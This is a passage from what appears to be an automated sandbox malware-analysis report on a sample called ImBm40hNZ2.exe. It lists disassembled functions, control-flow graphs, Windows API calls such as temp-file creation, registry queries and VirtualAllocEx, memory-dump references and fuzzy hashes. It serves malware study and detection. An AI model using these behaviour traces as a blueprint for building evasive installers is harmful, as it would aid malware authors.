                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12e5a36d5edc16662757fda151b16d574b2b14abbda879b5f82fb507a9edc51b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45112531908150ABEB113F755D449AF37B0EA66365728473BF491B22E2C23C0D42962E
                                                                                                                                                                                                                                                                Function 00405851 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 608 405851-40585b 609 40585c-405887 GetTickCount GetTempFileNameA 608->609 610 405896-405898 609->610 611 405889-40588b 609->611 612 405890-405893 610->612 611->609 613 40588d 611->613 613->612
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00405865
                                                                                                                                                                                                                                                                • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 0040587F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\ImBm40hNZ2.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                                                                • API String ID: 1716503409-1911354995
                                                                                                                                                                                                                                                                • Opcode ID: 165f25902c12276048ad14c3faa9af412f6aa489c6d0a6d50344be84ac3f20e0
                                                                                                                                                                                                                                                                • Instruction ID: 4003a4fe6d6a1be2c7c6231cfd42d77a102930ba0be0d4b8b296abf0166e01cb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 165f25902c12276048ad14c3faa9af412f6aa489c6d0a6d50344be84ac3f20e0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7CF05E366482086ADB109A56DC44F9A7B99DB95750F14C02AF904AA180D6B099548B59
                                                                                                                                                                                                                                                                Function 100016DA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 614 100016da-10001716 call 10001a86 618 10001827-10001829 614->618 619 1000171c-10001720 614->619 620 10001722-10001728 call 100021ce 619->620 621 10001729-10001736 call 10002218 619->621 620->621 626 10001766-1000176d 621->626 627 10001738-1000173d 621->627 628 1000178d-10001791 626->628 629 1000176f-1000178b call 100023d6 call 10001576 call 10001278 GlobalFree 626->629 630 10001758-1000175b 627->630 631 1000173f-10001740 627->631 632 10001793-100017cd call 10001576 call 100023d6 628->632 633 100017cf-100017d5 call 100023d6 628->633 654 100017d6-100017da 629->654 630->626 634 1000175d-1000175e call 10002abb 630->634 636 10001742-10001743 631->636 637 10001748-10001749 call 10002800 631->637 632->654 633->654 648 10001763 634->648 643 10001750-10001756 call 100025a2 636->643 644 10001745-10001746 636->644 645 1000174e 637->645 653 10001765 643->653 644->626 644->637 645->648 648->653 653->626 658 10001817-1000181e 654->658 659 100017dc-100017ea call 1000239c 654->659 658->618 661 10001820-10001821 GlobalFree 658->661 664 10001802-10001809 659->664 665 100017ec-100017ef 659->665 661->618 664->658 667 1000180b-10001816 call 100014ff 664->667 665->664 666 100017f1-100017f9 665->666 666->664 668 100017fb-100017fc FreeLibrary 666->668 667->658 668->664
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CED
                                                                                                                                                                                                                                                                  • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CF2
                                                                                                                                                                                                                                                                  • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CF7
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001785
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 100017FC
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001821
                                                                                                                                                                                                                                                                  • Part of subcall function 100021CE: GlobalAlloc.KERNEL32(00000040,FFFFFF25), ref: 10002200
                                                                                                                                                                                                                                                                  • Part of subcall function 100025A2: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001756,00000000), ref: 10002614
                                                                                                                                                                                                                                                                  • Part of subcall function 10001576: lstrcpyA.KERNEL32(00000000,?,00000000,100016B2,00000000), ref: 1000158F
                                                                                                                                                                                                                                                                  • Part of subcall function 100023D6: wsprintfA.USER32 ref: 1000243D
                                                                                                                                                                                                                                                                  • Part of subcall function 100023D6: GlobalFree.KERNEL32(?), ref: 100024F0
                                                                                                                                                                                                                                                                  • Part of subcall function 100023D6: GlobalFree.KERNEL32(00000000), ref: 10002519
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16992325573.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992292481.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992356898.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992388430.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1767494692-3916222277
                                                                                                                                                                                                                                                                • Opcode ID: c55bcf480a832e1354a89f694cc9a5d6983dd5aa282d365cdb61418dea4a19cc
                                                                                                                                                                                                                                                                • Instruction ID: 934e7617fa40043d42386ee9ca144464bf73cca2219d0ab945a4c64a7ea5d568
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c55bcf480a832e1354a89f694cc9a5d6983dd5aa282d365cdb61418dea4a19cc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA31AD758046059AFB41DF649CC6BDA37ECFF052D0F008425F90AAA19EDFB499458BA0
                                                                                                                                                                                                                                                                Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 671 401bb8-401bd0 call 4029e0 * 2 676 401bd2-401bd9 call 4029fd 671->676 677 401bdc-401be0 671->677 676->677 679 401be2-401be9 call 4029fd 677->679 680 401bec-401bf2 677->680 679->680 683 401bf4-401c08 call 4029e0 * 2 680->683 684 401c38-401c5e call 4029fd * 2 FindWindowExA 680->684 694 401c28-401c36 SendMessageA 683->694 695 401c0a-401c26 SendMessageTimeoutA 683->695 696 401c64 684->696 694->696 697 401c67-401c6a 695->697 696->697 698 401c70 697->698 699 402892-4028a1 697->699 698->699
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                • Opcode ID: 7b0f966d21450dab21967011264f0b2a79b9c118bf8cbf56b5803b2581db9112
                                                                                                                                                                                                                                                                • Instruction ID: 6b987b391dfe704e5e25f8c5ed1974f346454cd13820caa224fece71ffdffe90
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b0f966d21450dab21967011264f0b2a79b9c118bf8cbf56b5803b2581db9112
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D621B0B1A04208BFEF01AFB4CD4AAAE7BB5EF44344F10053EF541B61D1D6B89940D728
                                                                                                                                                                                                                                                                Function 004030AE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ImBm40hNZ2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405E54
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharNextA.USER32(?,?,?,00000000), ref: 00405E61
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharNextA.USER32(?,"C:\Users\user\Desktop\ImBm40hNZ2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405E66
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405E76
                                                                                                                                                                                                                                                                • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 004030CF
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                                                • API String ID: 4115351271-2414109610
                                                                                                                                                                                                                                                                • Opcode ID: 1ea2b1deb2575fa16d86268b89c9853e92957c035c0675f288212a8b63e03b10
                                                                                                                                                                                                                                                                • Instruction ID: eecbd6f84ea8616cf4882f1a33e1516d07f24589ae5fd842fb1f34df92f4a8b9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ea2b1deb2575fa16d86268b89c9853e92957c035c0675f288212a8b63e03b10
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EBD05E1141AC3022C42133263C0AFCF040C8F06719F918437F408710C24A2E098345EE
                                                                                                                                                                                                                                                                Function 00401B11 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00401B80
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401B92
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AllocFree
                                                                                                                                                                                                                                                                • String ID: Call
                                                                                                                                                                                                                                                                • API String ID: 3394109436-1824292864
                                                                                                                                                                                                                                                                • Opcode ID: bc367c68fc988450a7838e96f05bf1e26fe43bbd001d03be4b8de090aadb1637
                                                                                                                                                                                                                                                                • Instruction ID: 9717a96cc82752b9745dda345e5f929d8d53b2d10d66f9bc57db5fd7b1196717
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc367c68fc988450a7838e96f05bf1e26fe43bbd001d03be4b8de090aadb1637
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C221A172A04211ABD710ABA48A8995E73B8EB44714714857BF501B32D1D7BCF8109B1E
                                                                                                                                                                                                                                                                Function 00405A78 Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,00405CBD,00000000,00000002,?,00000002,?,?,00405CBD,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405AA1
                                                                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00405CBD,?,00405CBD), ref: 00405AC2
                                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?), ref: 00405AE3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3677997916-0
                                                                                                                                                                                                                                                                • Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                                                                                                                                                                                                                                • Instruction ID: 243cde366d026c4bbee3ae285cd60e09c1ede4c2eb0dd04642378b8e862c63c5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F01487114020AEFDB128F65EC84AEB3FACEF14354F004126F905A6220D235D964CFB5
                                                                                                                                                                                                                                                                Function 0040243A Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,000000EB,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                                                                                                                                                                                                                                • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402468
                                                                                                                                                                                                                                                                • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?), ref: 0040247B
                                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Enum$CloseOpenValue
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 167947723-0
                                                                                                                                                                                                                                                                • Opcode ID: 44a302db6482d8f83742b1e3beb1e5c4981743e928843549fc1dace8f48bd082
                                                                                                                                                                                                                                                                • Instruction ID: 1e99a264a9944b222e34705325ef89c31e77f1871a72d34f0e2539f6998fac94
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44a302db6482d8f83742b1e3beb1e5c4981743e928843549fc1dace8f48bd082
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BF0D172A04200EFE7119F659E8CEBF7A6CEB40348F10443EF441B62C0D6B85E41966A
                                                                                                                                                                                                                                                                Function 10002800 Relevance: 3.2, APIs: 2, Instructions: 156memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(00000000), ref: 100028BF
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 100029C6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16992325573.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992292481.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992356898.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992388430.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocErrorLastVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 497505419-0
                                                                                                                                                                                                                                                                • Opcode ID: 670f03678a5eaf619360d21028c39b4414a5d41f5967bb61c5d6db3b3f09e835
                                                                                                                                                                                                                                                                • Instruction ID: e4aa2bd3e495effe50d9526cbc68d205f519acfcad6f3d50ccedb804016fbdef
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 670f03678a5eaf619360d21028c39b4414a5d41f5967bb61c5d6db3b3f09e835
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D5162BA908215DFFB10DFA4DCC675937B4EB443D5F21842AEA08E722DDF34A9808B54
                                                                                                                                                                                                                                                                Function 004023C8 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,000000EB,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F8
                                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3677997916-0
                                                                                                                                                                                                                                                                • Opcode ID: d5b49ddab0cd4e2ea66004b9ca03d90090f65eaedbc84a66a30e005ee5890498
                                                                                                                                                                                                                                                                • Instruction ID: 062f64408cc8674e1b050eceadd28ab238dc71c9c97f21e558eb7ec8d4e55ee6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d5b49ddab0cd4e2ea66004b9ca03d90090f65eaedbc84a66a30e005ee5890498
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7411C131905205EFDB11DF60CA889BFBBB4EF10344F20847FE442B62C0D2B85A41DB6A
                                                                                                                                                                                                                                                                Function 0040570F Relevance: 3.0, APIs: 2, Instructions: 46stringCOMMON
